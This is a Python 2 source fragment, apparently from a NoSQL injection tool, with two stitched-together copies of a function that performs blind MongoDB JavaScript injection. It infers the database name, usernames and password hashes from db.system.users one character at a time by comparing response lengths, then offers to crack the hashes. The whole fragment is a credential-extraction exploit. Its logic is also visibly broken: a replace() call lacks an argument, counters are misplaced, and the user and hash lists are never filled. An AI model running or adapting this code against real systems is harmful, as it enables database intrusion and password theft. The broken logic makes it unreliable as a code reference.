def getDBInfo():
    curLen = 0
    nameLen = 0
    gotFullDb = False
    gotNameLen = False
    gotDbName = False
    gotColLen = False
    gotColName = False
    gotUserCnt = False
    finUser = False
    dbName = ""
    charCounter = 0
    nameCounter = 0
    usrCount = 0
    retrUsers = 0
    users = []
    hashes = []
    crackHash = ""

    chars = string.ascii_letters + string.digits
    print "Getting baseline True query return size..."
    trueUri = uriArray[16].replace("---", "return true; var dummy ='!" + "&")
    #print "Debug " + str(trueUri)
    req = urllib2.Request(trueUri, None, requestHeaders)
    baseLen = int(len(getResponseBodyHandlingErrors(req)))
    print "Got baseline true query length of " + str(baseLen)

    print "Calculating DB name length..."

    while gotNameLen == False:
        calcUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.length ==" +
            str(curLen) + ") {return true;} var dum='a" + "&")
        #print "Debug: " + calcUri
        req = urllib2.Request(calcUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))
        #print "Debug length: " + str(lenUri)

        if lenUri == baseLen:
            print "Got database name length of " + str(curLen) + " characters."
            gotNameLen = True

            curLen += 1

    print "Database Name: ",
    while gotDbName == False:
        charUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.charAt(" +
            str(nameCounter) + ") == '" + chars[charCounter] +
            "') { return true; } var dum='a" + "&")

        req = urllib2.Request(charUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))

        if lenUri == baseLen:
            dbName = dbName + chars[charCounter]
            print chars[charCounter],
            nameCounter += 1
            charCounter = 0

            if nameCounter == curLen:
                gotDbName = True

            charCounter += 1
    print "\n"

    getUserInf = raw_input("Get database users and password hashes (y/n)? ")

    if getUserInf.lower() == "y":
        charCounter = 0
        nameCounter = 0
        # find the total number of users on the database
        while gotUserCnt == False:
            usrCntUri = uriArray[16].replace(
                "---", "var usrcnt = db.system.users.count(); if (usrcnt == " +
                str(usrCount) + ") { return true; } var dum='a")

            req = urllib2.Request(usrCntUri, None, requestHeaders)
            lenUri = int(len(getResponseBodyHandlingErrors(req)))

            if lenUri == baseLen:
                print "Found " + str(usrCount) + " user(s)."
                gotUserCnt = True

                usrCount += 1

        usrChars = 0  # total number of characters in username
        charCounterUsr = 0  # position in the character array-Username
        rightCharsUsr = 0  # number of correct characters-Username
        rightCharsHash = 0  # number of correct characters-hash
        charCounterHash = 0  # position in the character array-hash
        username = ""
        pwdHash = ""
        charCountUsr = False
        query = "{}"

        while retrUsers < usrCount:
            if retrUsers == 0:
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne(); if (usr.user.length == "
                        + str(usrChars) + ") { return true; } var dum='a" +

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True

                        usrChars += 1

                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne(); if (usr.user.charAt("
                        + str(rightCharsUsr) + ") == '" +
                        chars[charCounterUsr] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0

                        charCounterUsr += 1

                retrUsers += 1
                # reinitialize all variables and get ready to do it again
                #print str(retrUsers)
                #print str(users)
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                username = ""

                while rightCharsHash < 32:  #Hash length is static
                    hashUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne(); if (usr.pwd.charAt("
                        + str(rightCharsHash) + ") == '" +
                        chars[charCounterHash] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        #print pwdHash
                        rightCharsHash += 1
                        charCounterHash = 0

                        charCounterHash += 1

                print "Got user:hash " + users[0] + ":" + hashes[0]
                # reinitialize all variables and get ready to do it again
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.user.length == " +
                        str(usrChars) + ") { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True

                        usrChars += 1

                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.user.charAt(" +
                        str(rightCharsUsr) + ") == '" + chars[charCounterUsr] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0

                        charCounterUsr += 1

                retrUsers += 1
                # reinitialize all variables and get ready to do it again

                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0

                while rightCharsHash < 32:  #Hash length is static
                    hashUri = uriArray[16].replace(
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.pwd.charAt(" +
                        str(rightCharsHash) + ") == '" +
                        chars[charCounterHash] +
                        "') { return true; } vardum='a" + "&")

                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        rightCharsHash += 1
                        charCounterHash = 0

                        charCounterHash += 1

                print "Got user:hash " + users[retrUsers -
                                               1] + ":" + hashes[retrUsers - 1]
                # reinitialize all variables and get ready to do it again
                username = ""
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
    crackHash = raw_input("Crack recovered hashes (y/n)?:  ")

    while crackHash.lower() == "y":
        menuItem = 1
        for user in users:
            print str(menuItem) + "-" + user
            menuItem += 1

        userIndex = raw_input("Select user hash to crack: ")
        nsmmongo.passCrack(users[int(userIndex) - 1],
                           hashes[int(userIndex) - 1])

        crackHash = raw_input("Crack another hash (y/n)?")
    raw_input("Press enter to continue...")
def getDBInfo():
	curLen = 0
	nameLen = 0
	gotFullDb = False
	gotNameLen = False
	gotDbName = False
	gotColLen = False
	gotColName = False
	gotUserCnt = False
	finUser = False
	dbName = ""
	charCounter = 0
	nameCounter = 0
	usrCount = 0
	retrUsers = 0
	users = []
	hashes = []
	crackHash = ""
	chars = string.ascii_letters + string.digits
	print "Getting baseline True query return size..."
	trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
	#print "Debug " + str(trueUri)
	baseLen = int(len(urllib.urlopen(trueUri).read()))
	print "Got baseline true query length of " + str(baseLen)
	print "Calculating DB name length..."
	while gotNameLen == False:
		calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
		#print "Debug: " + calcUri
		lenUri = int(len(urllib.urlopen(calcUri).read()))
		#print "Debug length: " + str(lenUri)
		if lenUri == baseLen:
			print "Got database name length of " + str(curLen) + " characters."
			gotNameLen = True
			curLen += 1
	print "Database Name: ", 		
	while gotDbName == False:
		charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
		lenUri = int(len(urllib.urlopen(charUri).read()))

		if lenUri == baseLen:
			dbName = dbName + chars[charCounter]
			print chars[charCounter],
			nameCounter += 1
			charCounter = 0
			if nameCounter == curLen:
				gotDbName = True
			charCounter += 1
	print "\n"
	getUserInf = raw_input("Get database users and password hashes (y/n)? ")
	if getUserInf in yes_tag:
		charCounter = 0
		nameCounter = 0
		#find the total number of users on the database
		while gotUserCnt == False:
			usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
			lenUri = int(len(urllib.urlopen(usrCntUri).read()))
			if lenUri == baseLen:
				print "Found " + str(usrCount) + " user(s)."
				gotUserCnt = True
				usrCount += 1
		usrChars = 0  #total number of characters in username
		charCounterUsr = 0 #position in the character array-Username
		rightCharsUsr = 0 #number of correct characters-Username
		rightCharsHash = 0 #number of correct characters-hash
		charCounterHash = 0 #position in the character array-hash
		username = ""
		pwdHash = ""
		charCountUsr = False
		query = "{}"
		while retrUsers < usrCount:
			if retrUsers == 0:
				while charCountUsr == False:
					#different query to get the first user vs. others
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
					if lenUri == baseLen:
						#Got the right number of characters
						charCountUsr = True
						usrChars += 1
				while  rightCharsUsr < usrChars:
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
					if lenUri == baseLen:
						username = username + chars[charCounterUsr]
						#print username
						rightCharsUsr += 1
						charCounterUsr = 0				
						charCounterUsr += 1
				retrUsers += 1
				#reinitialize all variables and get ready to do it again
				#print str(retrUsers)
				#print str(users)
				charCountUsr = False
				rightCharsUsr = 0
				usrChars = 0
				username = ""
				while rightCharsHash < 32:  #Hash length is static
					hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(hashUri).read()))
					if lenUri == baseLen:
						pwdHash = pwdHash + chars[charCounterHash]
						#print pwdHash
						rightCharsHash += 1
						charCounterHash = 0
						charCounterHash += 1
				print "Got user:hash " + users[0] + ":" + hashes[0]
				#reinitialize all variables and get ready to do it again
				charCounterHash = 0
				rightCharsHash = 0
				pwdHash = ""
				while charCountUsr == False:
					#different query to get the first user vs. others
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
					if lenUri == baseLen:
						#Got the right number of characters
						charCountUsr = True
						usrChars += 1
				while  rightCharsUsr < usrChars:
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")	
					lenUri = int(len(urllib.urlopen(usrUri).read()))
					if lenUri == baseLen:
						username = username + chars[charCounterUsr]
						#print username
						rightCharsUsr += 1
						charCounterUsr = 0				
						charCounterUsr += 1
				retrUsers += 1
				#reinitialize all variables and get ready to do it again
				charCountUsr = False
				rightCharsUsr = 0
				usrChars = 0
				while rightCharsHash < 32:  #Hash length is static
					hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
					lenUri = int(len(urllib.urlopen(hashUri).read()))
					if lenUri == baseLen:
						pwdHash = pwdHash + chars[charCounterHash]
						rightCharsHash += 1
						charCounterHash = 0
						charCounterHash += 1
				print "Got user:hash " + users[retrUsers-1] + ":" + hashes[retrUsers-1]
				#reinitialize all variables and get ready to do it again
				username = ""
				charCounterHash = 0
				rightCharsHash = 0
				pwdHash = ""
	crackHash = raw_input("Crack recovered hashes (y/n)?:  ")		
	while crackHash in yes_tag:
		menuItem = 1
		for user in users:
			print str(menuItem) + "-" + user
			menuItem +=1
		userIndex = raw_input("Select user hash to crack: ")
		crackHash = raw_input("Crack another hash (y/n)?")		
	raw_input("Press enter to continue...")